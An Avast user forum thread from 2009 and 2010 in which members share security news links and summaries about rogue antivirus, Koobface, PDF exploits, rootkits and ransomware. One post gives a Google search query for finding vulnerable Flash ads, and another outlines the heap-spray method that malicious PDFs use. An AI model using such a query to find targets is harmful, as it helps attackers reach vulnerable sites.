-
***
It was suggested that we needed these all in one thread. So, I have created this thread for that use and hope that all will use this thread to post the security warnings on this forum.
Here is a link to the posting that prompted this thread.
http://forum.avast.com/index.php?topic=52250.msg442193#msg442193
***
-
Now we just need a mod to make it a sticky, and we'll be set!
-
If everyone placed the security warnings in here it wouldn't need to be sticky as the activity would keep it high, as is seen with the >> Updates << topic.
I have an aversion for stickies, almost as severe as for toolbars ;D
-
I for one wouldn't mind a sticky for this thread here ;) such a thread is obviously needed and..and thanks to the OP for starting it :)
-
How do you tell if a topic is a sticky?
It sure is easy in Malwarebytes forum:
http://www.malwarebytes.org/forums/index.php?showforum=11
@ DavidR
+1
-
How do you tell if a topic is a sticky?
like that ;D
-
I for one wouldn't mind a sticky for this thread here ;) such a thread is obviously needed and..and thanks to the OP for starting it :)
Sticky isn't needed since this will rise to the top each time an entry is posted which is the same criteria with many other frequent Threads. :)
( missed Davids post. :) )
-
i got it, i got it! ;D
nevermind the sticky subject...
-
Rogue antivirus lurks behind Google Doodle searches
http://www.networkworld.com/news/2009/121609-rogue-antivirus-lurks-behind-google.html?t51hb
Five things you need to know about social engineering
The more victims who click links and install the bad guy's software, the more money the criminals make
http://www.pcworld.idg.com.au/article/330130/five_things_need_know_about_social_engineering?fp=4&fpid=776400
-
A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
-
A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
+1.
I use a hosts file, and SpywareBlaster. (Yeah, belts and braces, I know...).
If I'm careless enough to click on any of those Google sponsored results that rise to the top like a pale yellow scum, about 9 times out of 10 my browser can not connect to the site.
Fine by me.
-
Google sponsored results ??? what's that ??? >>>>>>>>>>>>>>>>> http://adblockplus.org/en/ ;D (or "adthwart" in Chrome)
-
Well there is always the CustomizeGoogle add-on which I use and I never see sponsored ads anyway, my comment was one of caution for others considering the sponsored links.
-
yeah I got CustomizeGoogle as well with ads blocked wherever it's possible. I never mention it because it's set once for all, and I forget about it, while abp allows to block more than what's on the EasyLists, on demand. It's just that ABP has more visibility during the browsing. Sorry for the off topic ;)
-
Just made a topic about this, but thought I would post here too anyway.
Modern Warfare 2 servers hacked, Trojan's inserted.
http://www.infinityward.com/forum/viewtopic.php?f=24&t=181646 (http://www.infinityward.com/forum/viewtopic.php?f=24&t=181646)
-
Hi you malware fighters and posters of this thread,
Well, add this link and read the bottom posting there please?
http://forum.avast.com/index.php?topic=52349.msg443049#msg443049
and then add this one as well as a Security Warning:
http://forum.avast.com/index.php?topic=52310.msg442762#msg442762
pol
-
SSL-servers targeted by botherders
To-day by polonus
Comments and reactions:
Not only Windows desktops are targeted by botnet herders that want to enlarge their botnets, also more and more they will target FTP, SSL and webservers to be taken over. The hijacked or hacked servers will then often function as malcode database or are being used to forward spam. According to Finnish av vendor F-Secure FTP servers are the favorite hack target for cybercriminals. "We also saw that where SSL-servers were being abused. Sites with a valid SSL-certificate become hacked and then abused for drive-by downloads", according to reasearcher Mikko Hypponen.
Through running a drive-by download via a HTTPS-connection some proxy and gateway scanners cannot scan for malware. "Then it is easier to break into servers", says Hypponen. Then server botnets are being formed out of these hacked servers, functioning as a form of sub-botnets. "We now see server botnets. An interesting feature is that these interconnected server botnet is herded by one individual", says Shadowserver Foundation's DiMino. Servers are to facilitate botnet extension and expansion.
Server-bots
In the mean time we spotted specific server-bots to use PHP and Perl to change servers into realtime spam machines. "The benefit there is the enormous amount of bandwidth and power to maximize the amount of spam sent." According to security expert Marc Maiffret botherserd are recruiting attackers that are experienced server hackers. Maiffret expects legit websites to be the main target for webattacks in 2010 and beyond:
http://www.darkreading.com/vulnerability_management/security/app-security/showArticle.jhtml;jsessionid=4RTX0GD0KT3ILQE1GHPSKHWATMY32JVN?articleID=222002433
pol
P.S. If these malserver bots perform a man in the middle attack you can forget SSL security alltogether,
D
-
Unless something is seriously done about all these drive by attacks,
the internet as we know it will soon cease to exist. :'(
-
***
Misplaced security warning notice :
http://forum.avast.com/index.php?topic=52307.msg442708#msg442708
***
-
***
Another misplaced security warning :
http://forum.avast.com/index.php?topic=52349.msg443049#msg443049
***
-
China cages game Trojan hackers
(Go directly to jail, do not collect any gold)
http://www.theregister.co.uk/2009/12/17/china_jails_game_trojan_vxers/
-
Film review site hacked to spew malicious PDFs
Hackers on Thursday exploited a vulnerability on Ain't It Cool News that redirected anyone visiting the movie review site to a server containing a malicious Adobe Reader file.
http://www.theregister.co.uk/2009/12/18/aintitcool_malware_attack/
-
Hi malware fighters,
Last week av vendor CA revealed the detection of a botnet inside Amazon's EC2 cloud:
http://community.ca.com/blogs/securityadvisor/archive/2009/12/09/zeus-in-the-cloud.aspx & http://blogs.zdnet.com/security/?p=5110
But according to Scan Safe's Mary Landesman it already existed for a couple of years.
"In spite of recent messages distributing malware through Amazon's cloudservices is not a new phenomenon. It has been happening since June last where Amazon's S3 service is concerned and since February 2008 takes place at Amazon's EC2 service", reports Landesman. This totaled up during the last three years to 80 unique malware incidents where Amazon was concerned. 22 incidents took place during 2007, 13 during 2008 and 45 were seen this year. Re: http://blog.scansafe.com/journal/2009/12/17/amazon-cloud-has-rained-malware-before.html
"It is no guarantee for a safe malcode location." Therefore links to the Amazon cloud should be treated extra carefully, just like links to other sources. On the other hand "cloud malware" can be easily halted as Amazon will not treat this lightly, allthough they were rather lax in removing it,
polonus
-
Hi CharleyO and all the other malware fighters,
The zero-day hole in Adobe Reader and Acrobat will not earlier be patched as the next patch round within three weeks' time (that is in the new year) and hackers now abuse it actively to infect systems.
An out-of-band patch for this critical hole would have a negative impact, according to Adobe's Brad Arkin....
You can be protected here, for Adobe recommends customers follow the mitigation guidance below, utilizing the Adobe Reader and Acrobat JavaScript Blacklist Framework, until a patch is available.
Windows: For end-users on Windows, download the compressed file from here: http://download.macromedia.com/pub/acrobat/updates/APSA09-07_C_Reg_Keys.zip
, and double-click on the appropriate registry setting, based on your version of Reader or Acrobat, to populate the JavaScript Blacklist Framework. Adobe will automatically reset the value during the next update.
http://kb2.adobe.com/cps/532/cpsid_53237.html
polonus
-
Unless something is seriously done about all these drive by attacks,
the internet as we know it will soon cease to exist. :'(
*nods* :-\
Don't you think it would be a neat idea, to have anti-virus "bots" with different scan engines running around the internet scanning every website it comes across, and then saving the information and location of the suspicious site. Until Bot 2 with a different engine comes around and confirms what Bot 1 found.
/End day dreaming.
-
Hi Alan|Cvette,
We already have that aboard - the avast webshield is protecting you, and FlashGotters and NoScripters of all lands have been protected against previous, present and future threats from the day FG and NS came around and with Request Policy extensions to top it off, I will browse my Fx or Flock browser with full confidence. And if NS extension would come to Chrome or SRWare's Iron I would use that browser for the additional built in tab "sandbox" security that now has landed also in Firefox 3.7 Minefield. So there is still hope for you and your dream has already been realized, you just have to install it, and then the people of Shadowserver Foundation are working your dream every day: http://www.shadowserver.org/wiki/
I wish you Merry Christmas and a Happy NewYear,
pol
-
Hi Alan|Cvette,
We already have that aboard - the avast webshield is protecting you, and FlashGotters and NoScripters of all lands have been protected against previous, present and future threats from the day FG and NS came around and with Request Policy extensions to top it off, I will browse my Fx or Flock browser with full confidence. And if NS extension would come to Chrome or SRWare's Iron I would use that browser for the additional built in tab "sandbox" security that now has landed also in Firefox 3.7 Minefield. So there is still hope for you and your dream has already been realized, you just have to install it, and then the people of Shadowserver Foundation are working your dream every day: http://www.shadowserver.org/wiki/
I wish you Merry Christmas and a Happy NewYear, pol
I always have my "light bulb" moment a few years too late ;D hahaha. I sure do love Firefox though:
Adblock+
BetterPrivacy
Browser Defender
CS Lite
Finjan
Ghostery
Lastpass
NoScript
WOT
I feel naked browsing in IE without those, IEtab is nice too so I don't have to switch if a website requests I use IE.
I only wish Avast!'s sandboxing would work with my Firefox :-[
---
Iron is pretty cool, I never really use it or Chrome that much though. I'm trying out Google Frame right now which is basically Chrome's best features in Internet Explorer.
Merry Christmas pol!
-
Interesting read:
http://en.wikipedia.org/wiki/Honeypot_%28computing%29
-
Data Doctor 2010 will make you sick (http://boelectronic.blogspot.com/2009/12/data-doctor-2010-will-make-you-sick.html)
Data Doctor 2010 (http://sites.google.com/site/boelectronic/computer/malware/list-of-common-malwares/data-doctor-2010), an encryption trojan via our old "friends" iframedollars. It encrypts the files on your hard drive very rapidly if you’re unfortunate enough to be victimized by it.
-
Facebook is getting worse everyday!! God Damn Koobface!!
Take care about what you are seeing in facebook, what you click on and what you do, The Koobface worm is growing too fast and I've seen most of my friends are hacked by this nasty worm and their account is sending malware links to their friends via comment on their wall, private message or chat.
1. More Info: http://boelectronic.blogspot.com/2009/12/facebook-money-mule-or-credit-card.html
2. More Info: http://boelectronic.blogspot.com/2009/12/check-your-friends-facebook-ims-may.html
3. Clicking on the links in my own test (I did in my test machine, I'm not infected!) redirected to... (Screenshot and info in the follow link): http://boelectronic.blogspot.com/2009/12/oh-oh-oh-santa-delivering-fakeav.html
(posts in my blog are collected from other companies blogs).
[I posted that Koobface Sample to avast!, hope avast! detect it soon]
-
definitely staying away from Facebook, I hate it anyway ;D thanks for the heads up ;)...I'll let my friends using it regularly know about the risks, again.
-
I dropped Facebook as soon as they messed with my privacy settings. >:(
-
Facebook user with no problems what so ever.
I have changed all the settings to best suit me and will not accept any application requests. nor do I upload any pictures in any social networking sites.
I don't have any problems using fb.
nmb
-
Facebook user with no problems what so ever.
I have changed all the settings to best suit me and will not accept any application requests. nor do I upload any pictures in any social networking sites.
I don't have any problems using fb.
nmb
+1
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
-
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
I'm already.
nmb
-
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
I'm already.
nmb
Don't do Facebook...doesn't MBAM have a Twitter account?
-
Become a Fan on Facebook:
http://www.malwarebytes.org/forums/index.php?showtopic=16409
I'm already.
nmb
Don't do Facebook...doesn't MBAM have a Twitter account?
Follow us on Twitter!
http://www.malwarebytes.org/forums/index.php?showtopic=16338
-
Thank you, YK. ;)
-
Pharma link spammers invade Live Space
http://www.theregister.co.uk/2009/12/23/link_spammers_hit_live_space/
Live.com Exploited as Pharma-Fraud Cover
http://threatcenter.blogspot.com/2009/12/livecom-exploited-as-pharma-fraud-cover.html
-
From Norman Security
Summing up 2009 - predictions for the year to come
http://www.norman.com/security_center/security_center_archive/2009/74565/en
-
***
Misplaced warning :
http://forum.avast.com/index.php?topic=52529.0
***
-
Hi malware fighters,
Latest software of adservers vulnerable: http://forum.openx.org/index.php?showtopic=503454011
8 million vunerable Flash-ads can be googled up: http://www.google.com/search?hl=en&num=100&q=filetype:swf+inurl:clickTAG&aq=f&oq=&aqi=
Cross site scripting attacks are actually being performed: http://kingfeatures.com/pressrm/PR316.htm
and this was done in the past as well: http://www.thetechherald.com/article.php/200952/4979/Funny-pages-used-to-launch-PDF-attack-on-latest-vulnerability
polonus
-
Hi malware fighters,
This year also saw an explosive increase of the number of malware-kits, making everyone to construct his own malware within a few mouse-clicks, Especially for Xmas-time the malcreants launched "Chrismas Stealer" to steal log-in data from Firefox and MSN. Re: http://blog.damballa.com/?p=462
The user just has to fill out his own mail-address and that of the victim. Then the victim will get an e-mail with an attachment. When this gets opened the Firefox log-in data and MSN log-in data will be sent to the sender. On the other side these kits could also dupe the user to loose his log-in data,
polonus
-
Hi malware fighters,
Malware "horror"scope for 2010 -
All security and av-vendors have made predictions for the coming security year 2010. Panda Security - Kaspersky Lab - F-Secure - AVG - RSA - Verizon - Anton Chuvakin - McAfee - Symantec - ESET looked into their crystal balls and came up with the following predictions for 2010
The summon it up neatly more of the same but in larger quantities. But the insights differ.
W 7 and Mac OS X
The introduction of W7 this year is a positive influence according to Finnish F-secure researchers, XP SP3 will become a malware-haven or malware getto in regions where W7 is less prevalent. Most av-vendors think that when the participation of W7 is large enough also this new OS will be attacked. They foresee this coming within the next two years, according to Panda Security. Malcreants are migrating their malware for the new MS platform and especially migrating to the 64-bit version. Kaspersky means that the security holes inside the new Windows7 will result in many drive-by download attacks, and also because of holes in products like Adobe's and Apple's are being found. Security vendor Verizon has another vision. Windows 7 will be more robust as expected and withstand attacks so attackers will go for the application software.
Also the Mac OS X will have full attention of malcreants. As the market share increases, the larger the number of attacks will become. “2010 will prove once and for all that Macs aren't immune to exploits”, according to Websense.
Fake-virusscanners
The most remarkable prediction has PC Tools. The vendor predicts a trend to combine all existing malware trends with new, inventive techniques. This malware will be more socially interactive and look more reliable and trustworthy to users, like some fake-av programs already do. The next step will be that cyber criminals are going to use budgets to start their own call centers, helplines, and virtual offices and service providers and even start ad campaigns for their rogue fake av scanners. Furthermore fake av scanners will become more and more aggressive and will even hijack operational systems.
Kaspersky on the contrary predicts less fake av-scanners, because the market is flooded by them already, so less income for the crooks. Also raised attention from intelligence and security services alike make it harder to spread and create fake av.
Fortinet thinks that the general users now is aware of scare ware, cyber criminals will switch to ransom ware during 2919, where the ask money for digital properties they encrypted.
Ads
This year the New York Times was being hit by attackers posing as legit advertisers and then placed malicious ads. A succesful attack well worth investing in it. Legit bought ads or hacked ad space users will be attacked in this way during the coming year.
Social engineering
Now the Operational System and applications are becoming more solid and secure, the easiest way to get to people's money or install malicious software is to socially engineer or mislead them, according to ESET's Randy Abrams. He too thinks the coming of W7 makes malcreants can't easily infect systems. Symantec says social engineering became so popular because it does not matter what OS or what browser is being used, the user themselves are being attacked. “Weak parts on a computer are less important. Social engineering has become one of the prevailing attack methods and this will be the growing trend for 2010.”
Shortened URL-services
Services to shorten URLs have become a trend with Twitter. A big problem there is that the user does not know where they re-direct to after clicking the link. The popular URL-shortener Bit.ly let us know they will scan better for spam and malcode, nut an increase in abusing the services is expected for the coming new year. Also spammers will use shortened URLs to circumvent spam filters. But parties involved will protect better, because their business model will be under attack.
Human CAPTCHA-crackers
As spammers find it more and more difficult to break the CAPTCHA-codes automatically, they will use human forces in developing economies to define new spam accounts manually to try and circumvent new detection technologies. Symantec assumes individuals that manually make the accounts get paid 10% of the overall costs, while account hunters will get 30 to 40 dollar per 1.000 accounts.
DDoS-attack
At least one big distributed denial-of-service (DDoS) against some nation. according to F-Secure.
Everyone into the Cloud
The cloud will be the av technology of the days to come, while others now report they have been doing this "for years and years". In 2010 all av vendors will go into the cloud if they aren't already doing so, well this means Spanish Panda Security. On the other side cloud services are an interesting target platform for attackers.
A specific service that can await new attacks is Google Wave. Initially cybercrime will use the service for spreading spam, then it will be abused in phishing attacks, abusing security holes and spreading malware will follow. Chrome OS will be left alone, while MacAfee thinks this will be a hacker's paradise.
Last but not least cyber criminals will hide inside the cloud, like we have seen this recent year.
Cyberwar
For quite some time we hear about cyberwar and cyber terror, where China and North-Korea are mentioned. We saw large scale Ddos-attacks against Estonia and Georgia last year. Govt sites can also come under attack of politically motivated hackers to deface an official website with political slogans. We will see both kind of attacks during the coming year.
Increase of malware
All av vendors agree that we will encounter more and more vicious malcode during 2010. A lot of av scanners will have a hard time to detect them, predicts Kaspersky Lab. Some vendors will develop complex security software as an answer to this kind of advanced malware, but some malware will be able to circumvent detection, go under the radar and stay immune for quite some time.
Users that do their Internet banking have to watch out for state of the art banking Trojans. Then the malcreants will develop geo-located attack-versions that are varied according to language and content, so the user will run a higher risk to open the wrong link. Symantec also expects an increase of English language spam.
The World Soccer Chamiponships will play an important role for Trojans, fake-ticket business, spam, attacks on legit ticket shops and DDoS-attacks.
AVG sees the coming automatic malware generation as one of the biggest problems for 2010,
making end-users will choose compete security suites over a stand-alone av solution. Then it warns against upcoming economies. The number of users in Brazil, China and India will increase tremendously, but using illegal software and the absence of av or fw will create lots of problems Users will be sitting ducks for attack in mentioned countries.
Verizon thinks the development of malware will come to a standstill. “Malware won't evolve further.”
Full-disk encryption and NAC
This will not come to fruition and there won't be a break-through, says Anton Chuvakin, who is predicting that Network Access Controls (NAC) will be almost gone near the end of 2010.
Data leaks
In 2009 the biggest leakage of data took place in human history, the theft of over 130 million creditcard data at Heartland Payment Systems. The coming year will see more data leakage, but smaller. McAfee focuses on social networking. Fake applications will be a problem for the hundreds of millions that use it, turning their data into the hands of cyber crooks.
China
Will stay at the wrong end of the stick (and stays an interesting role model for others Grin )
Community
De internet community will slowly get educated, according to Verizon.The number of senior users that deal with cybercrime will go down considerably, while young ones learn their generation how to protect, so they will be better informed and able to secure themselves by identifying, finding and defy cyber criminals. After a ten year period of study, research, coordination and training cyberpolice will now finally come "harvest" on this, according to McAfee.
RSA closed on a positive note, that there will be more cooperation between the members of the security community, both researchers and vendors alike will cooperate to launch new initiatives.
Well anyway Polonus wishes you all a malware free and solidly secure avast-year 2010!
polonus
-
Good Guys Bring Down the Mega-D Botnet
Chalk up one for the defenders. Here’s how a trio of security researchers used a three-step attack to defeat a 250,000-pronged botnet.
http://www.pcworld.com/article/185122/good_guys_bring_down_the_megad_botnet.html
-
Top 10 tech stories of the decade
http://computerworld.co.nz/news.nsf/tech/E40BE6B4769086A2CC25769A00716FEA
-
***
It was suggested that we needed these all in one thread. So, I have created this thread for that use and hope that all will use this thread to post the security warnings on this forum.
Here is a link to the posting that prompted this thread.
http://forum.avast.com/index.php?topic=52250.msg442193#msg442193
*** I am running Vista Home Premium and when I go into Control Panel/Security it shows I am not running a virus protection program. How do I get this to recognize that I am running Avast Home Edition?
PS: I hope I am posting this in the right place.
-
PS: I hope I am posting this in the right place.
you are not, go here and start a new topic http://forum.avast.com/index.php?board=2.0
-
yeah, he had a security warning ;D ROFL
-
The curious case of Combofix and the hostile copyright infringer (http://www.bleepingcomputer.com/forums/topic279176.html)
-
The curious case of Combofix and the hostile copyright infringer (http://www.bleepingcomputer.com/forums/topic279176.html)
WOW...some people... ::) :o
ComboFix was what fixed my old pc when I first joined...in one swift script :)
Brilliant program (and Dev :))
-
As soon as I get back home, I'll have to remove it from my server. :'(
Edit,
It's now no longer visible. :'(
-
The curious case of Combofix and the hostile copyright infringer (http://www.bleepingcomputer.com/forums/topic279176.html)
Please DO NOT USE COMBOFIX on your own without supervision!!!
http://www.bleepingcomputer.com/forums/topic273628.html
-
Microsoft releases fix for Windows Vista Black Screen
December 30th, 2009
Microsoft has released a hotfix to resolve an issue, where a computer that is running Windows Vista or Windows Server 2008 stops responding at a black screen early in the startup process
http://www.thewindowsclub.com/microsoft-releases-fix-for-windows-vista-black-screen
-
Hackers actively abuse Symantec business av scanner holes.....
Security leaks in Symantec av scanners for the business market are now being actively abused
to download all sorts of nasty malware. http://isc.sans.org/diary.html?storyid=7834
The attacks take place through port 12174 and are aimed at Symantec AntiVirus Corporate Edition,
Client Security and Endpoint Security. According to the av vendor they see a dramatic increase
of the number of attacks for port 12174. http://www.securityfocus.com/bid/34671/exploit
The update for the four security holes in Alert Management System 2 (AMS2) i
has been available since April 28 2009, but it seems that some system admins were reluctant to
install them. AMS2 is part of the Symantec System Center console, AntiVirus Server,
and AntiVirus Central Quarantine Server.
The av-vendor advizes all firms to close port 12174 and to enroll the updates asap
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20090428_02
polonus
P.S. Weren't they Symantec not chosen as number 1 av recently in a test? Well, ahum...
D.
-
Hi malware fighters,
As reminded by bob3160 posted here also: http://forum.avast.com/index.php?topic=52979.msg449143#msg449143
topic Hexzone, Virut and Pusdo correlations...
pol
-
Hi malware fighters,
Security and threats to the Cloud: http://forum.avast.com/index.php?topic=53036.msg449605#msg449605
polonus
-
nothing really new here, just an update on what's going on:
Adobe Reader vuln hit with unusually advanced attack
Eight more days to go
http://www.theregister.co.uk/2010/01/04/adobe_reader_attack/
-
nothing really new here, just an update on what's going on:
Adobe Reader vuln hit with unusually advanced attack
Eight more days to go
http://www.theregister.co.uk/2010/01/04/adobe_reader_attack/
Damn, and avast wasn't among the few A/V's that found the infection. I guess we'll have to find the infection somewhere and submit it to alwil soon!
-
nothing really new here, just an update on what's going on:
Adobe Reader vuln hit with unusually advanced attack
Eight more days to go
http://www.theregister.co.uk/2010/01/04/adobe_reader_attack/
Damn, and avast wasn't among the few A/V's that found the infection. I guess we'll have to find the infection somewhere and submit it to alwil soon!
yes, I didn't look at the virus total link in the article.... :o
-
Hi malware fighters,
Threat for website defacements through XSS flaws on blogsites is reported here: http://forum.avast.com/index.php?topic=53082.msg449946#msg449946
polonus
-
Hi malware fighters,
Threat for website defacements through XSS flaws on blogsites is reported here: http://forum.avast.com/index.php?topic=53082.msg449946#msg449946
polonus
So now we have 2 posts for the same item... :)
-
Hi bob3160,
One full posting and one small additional link here. While you alerted for it..
Damian
-
Hi bob3160,
One full posting and one small additional link here. While you alerted for it..
Damian
agree with that, so that those who'd want to comment can go to the other thread and not clutter this one here.
-
Unfortunately that only creates more clutter so we now create 2 posts instead on one.
It defeats the whole purpose.
At this point, just make your separate posts, it's getting harder and harder to follow all the entries anyway.
-
Unfortunately that only creates more clutter so we now create 2 posts instead on one.
It defeats the whole purpose.
At this point, just make your separate posts, it's getting harder and harder to follow all the entries anyway.
+1
One post plus comments 8)
One post in SECURITY WARNINGS then 2 topics to follow ::)
-
Encryption busted on popular USB flash drives (http://ct.zdnet.com/clicks?t=520016790-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
A word of warning to those of you who rely on hardware-based encrypted USB flash drives. Security firm SySS has reportedly cracked the
AES 256-bit hardware-based encryption used on flash drives manufactured by Kingston, SanDisk and Verbatim.
-
Encryption busted on popular USB flash drives (http://ct.zdnet.com/clicks?t=520016790-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
A word of warning to those of you who rely on hardware-based encrypted USB flash drives. Security firm SySS has reportedly cracked the
AES 256-bit hardware-based encryption used on flash drives manufactured by Kingston, SanDisk and Verbatim.
bob you should have added this too, they didn't crack the algorithm, they used a security flaw in the encryption/decryption program:
The crack relies on a weakness so astoundingly bone-headed that it’s almost hard to believe. While the data on the drive is indeed encrypted using 256-bit crypto, there’s a huge failure in the authentication program. When the correct password is supplied by the user, the authentication program always send the same character string to the drive to decrypt the data no matter what the password used. What’s also staggering is that this character string is the same for Kingston, SanDisk and Verbatim USB flash drives.
if they had cracked AES 256, which is hardly to happen anytime soon, it would have made the headlines on a few sites and mags ;D ...but well, the program flaw is bad enough to be mentioned.
But there are alternatives, TrueCrypt and now Bitlocker (Windows 7 version) that can be used to encrypt USB drives as well.
-
Hacker pierces hardware firewalls with web page
http://forum.avast.com/index.php?topic=53163.msg450630#msg450630
-
Encryption busted on popular USB flash drives (http://ct.zdnet.com/clicks?t=520016790-98ec0b9bf7e2843a2a0b58f2ad773e46-bf&brand=ZDNET&s=5)
A word of warning to those of you who rely on hardware-based encrypted USB flash drives. Security firm SySS has reportedly cracked the
AES 256-bit hardware-based encryption used on flash drives manufactured by Kingston, SanDisk and Verbatim.
bob you should have added this too, they didn't crack the algorithm, they used a security flaw in the encryption/decryption program:
The crack relies on a weakness so astoundingly bone-headed that it’s almost hard to believe. While the data on the drive is indeed encrypted using 256-bit crypto, there’s a huge failure in the authentication program. When the correct password is supplied by the user, the authentication program always send the same character string to the drive to decrypt the data no matter what the password used. What’s also staggering is that this character string is the same for Kingston, SanDisk and Verbatim USB flash drives.
if they had cracked AES 256, which is hardly to happen anytime soon, it would have made the headlines on a few sites and mags ;D ...but well, the program flaw is bad enough to be mentioned.
But there are alternatives, TrueCrypt and now Bitlocker (Windows 7 version) that can be used to encrypt USB drives as well.
Logos,
I supplied the link which gave that information. :) I spent the time reading it and so did you so why shouldn't the rest of those that where interested. ;D
-
Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic.
http://www.theregister.co.uk/2010/01/07/juniper_critical_router_bug/
-
And Microsoft Patch on Tuesday.
http://threatpost.com/en_us/blogs/microsoft-plans-quiet-january-patch-tuesday-010710
-
Logos,
I supplied the link which gave that information. :) I spent the time reading it and so did you so why shouldn't the rest of those that where interested. ;D
the first lines of the article were misleading, and you quoted them, and just them, here's why...some might NOT read the article and but your post here.
-
Office.Microsoft.Com Search Results Can Lead To Rogue Anti-Virus
Date:01.08.2010
Threat Type: Malicious Web Site / Malicious Code
Websense Security Labs™ ThreatSeeker™ Network has detected that search results on office.microsoft.com can lead users to a Rogue AV page.
http://securitylabs.websense.com/content/Alerts/3519.aspx
-
Some Observations on Rootkits
Getting hit by a live rootkit infection is among the more unfortunate fates that can befall an unsuspecting computer user.
Parting thoughts
• Keep real-time protection enabled
• Run 64-bit Windows
http://blogs.technet.com/mmpc/archive/2010/01/07/some-observations-on-rootkits.aspx
-
Hi malware fighters,
Data Doctor is a new encryption cyber crime ransom tool that makes users believe their system does not function properly anymore after letting the OS start up in SafeMode, one has to pay 63 euro to get access to your data again.
Here is a tool to help you to de-encrypt: http://sunbeltblog.blogspot.com/2010/01/data-doctor-2010-encrypted-files-we.html
polonus
-
Industry group plans Cyber attack Simulation.
http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=222200643
-
Hi malware fighters,
Milions and millions of Windows computers runs an "unhealthy" kernel, as appeared from a Microsoft survey. The kernel is the heart of the Windows OS and changes to it could have disastrous reults. The most favourite technique to do this is for a rootkit to hide on a machine is making changes to the kernell. The software vendor wanted to know how many systems were actuallly rootkitted. "We found that a gigantic amount of computers is running a unhealthy kernel", according to MS MalwareProtection Center's Randy Treit. 1% of all tested computers , that means millions of machines for the whole of the Windows population.
Treit says it is not only malware that will makes changes to the kernel to destabilize the OS, also legit software can do thist. Whenthe kernel has been hijacked via legit software, a rootkit can hijack a next level, making detecting the malcode harder. Of all infestations 7% were low-level rootkits. For 60% the Alureon family of rootkists was responsible.
64-bit Windows
Acoording to Microsoft-analist the numbers show that 64-bit Windows systems are better protected against rootkits than a 32-bit Windows version (the situation now). Of all rootkits the software vendor found, only 0,67% functioned on a 64-bit platform. "It might well be that even a lower number of rootkits can activate on a 64-bit computer. Signing drivers and features ;ikes Kernel Patch Protection make 64-bit Windows ea rootkit hostile environment." Treit advizes users that want to outsmart rootkits to change to a 64-bit Windows. At the moment these systems are less risky. "When you could choose, go for the 64-bit."
polonus
-
@ polonus
Milions and millions of Windows computers runs an "unhealthy" kernel, as appeared from a Microsoft survey. The kernel is the heart of the Windows OS and changes to it could have disastrous reults. The most favourite technique to do this is for a rootkit to hide on a machine is making changes to the kernell. The software vendor wanted to know how many systems were actuallly rootkitted. "We found that a gigantic amount of computers is running a unhealthy kernel", according to MS MalwareProtection Center's Randy Treit. 1% of all tested computers , that means millions of machines for the whole of the Windows population.
That's what I indicated here with a link to the article:
http://forum.avast.com/index.php?topic=52252.msg451041#msg451041
-
Hi YoKenny,
Then we two are twice forewarned and twice forearmed. The tdsss is a nasty one, and the virus and worms is overflowing with victim messages asking for help, essexboy and oldman have their hands full to eliminate this persistent process hopper rootkit b*gger- also seems firefox WITHOUT noscript is another threat where this malware is concerned,
your friend pol
-
http://www.theregister.co.uk/2010/01/08/jaunaury_patch_tuesday/
Microsoft won't fix vulnerabilities in the latest versions of Internet Explorer or Windows during its regularly scheduled patch release on Tuesday, meaning users will have to wait at least another month to get updates that correct the security risks.
-
http://www.theregister.co.uk/2010/01/08/jaunaury_patch_tuesday/
Microsoft won't fix vulnerabilities in the latest versions of Internet Explorer or Windows during its regularly scheduled patch release on Tuesday, meaning users will have to wait at least another month to get updates that correct the security risks.
Anything on The Register is just there for sensationalism and media hype Microsoft's Jerry Bryant said the company is still working on a fix for the SMB flaw and is not aware of any in-the-wild attacks that target the weakness.
-
Anything on The Register is just there for sensationalism and media hype
it's simply not true ::) ...do you prefer the Inquirer ? :D
-
Anything on The Register is just there for sensationalism and media hype
it's simply not true ::) ...do you prefer the Inquirer ? :D
It got the "Tiger by the tail" story right.... ;D ;D
-
False Facebook charge group used to spread malware
Alert Print Post commentMalware pokes outraged users
http://www.theregister.co.uk/2010/01/11/facebook_charging_rumour_malfeasance/
Rogue phishing app smuggled onto Android Marketplace
Alert Print Post commentGhost in the machine
http://www.theregister.co.uk/2010/01/11/android_phishing_app/
-
Hi malware fighters,
G-Data warns that PDF is an insecure fileformat...
PDF is a nifty, but because of all security leaks an insecure file format , G Data warns. Last year 74 holes were found up for Adobe Reader and Acrobat, twice the number of 2008. The benefits to use PDF are clear. Through all sort of free PDF Readers it can be opened on various systems. Then it is hard to change a PDF file, something to prevent unauthorised changes of the file. Also it is a compact format, making it attractive to send as an attachment with emails.
Over the years the PDF file format got more features, adding greatly to the complexity of the software. Resulting in finding exploits and security holes a lot easier. Through simple toolkits like there are Eleanor, Liberty Exploit System or Elfiesta, it is quite easy to produce infested PDF-files. Such programs can be run without almost any technological insight from the side of the cyber criminals.
Attack
The majority of exploits will use an embedded JavaScript that will be executed upon opening the file. The malicious Javascript will use the so-called Heap Spray-method to overload memory with NOP-commands (No Operation-commands) and also by reloading the shellcode over and over again. The JavaScript-vulnerability in the PDF file can be used to run the shellcode and execute it. The executed shellcode will then download the malicious payload, for instanced botnetcomponents.
User that want to be protected are advised to use another leaner PDF-reader, but the av vendor asks users to install a av scanner and disable JavaScript at the same time or use the Windows DEP-function (Data Execution Prevention). "Well it is a pity that a lot of legit software won't run under mentioned settings."
Also a security warning for PDF documents, forewarned is forearmed, folks,
polonus
-
http://www.theregister.co.uk/2010/01/08/jaunaury_patch_tuesday/
Microsoft won't fix vulnerabilities in the latest versions of Internet Explorer or Windows during its regularly scheduled patch release on Tuesday, meaning users will have to wait at least another month to get updates that correct the security risks.
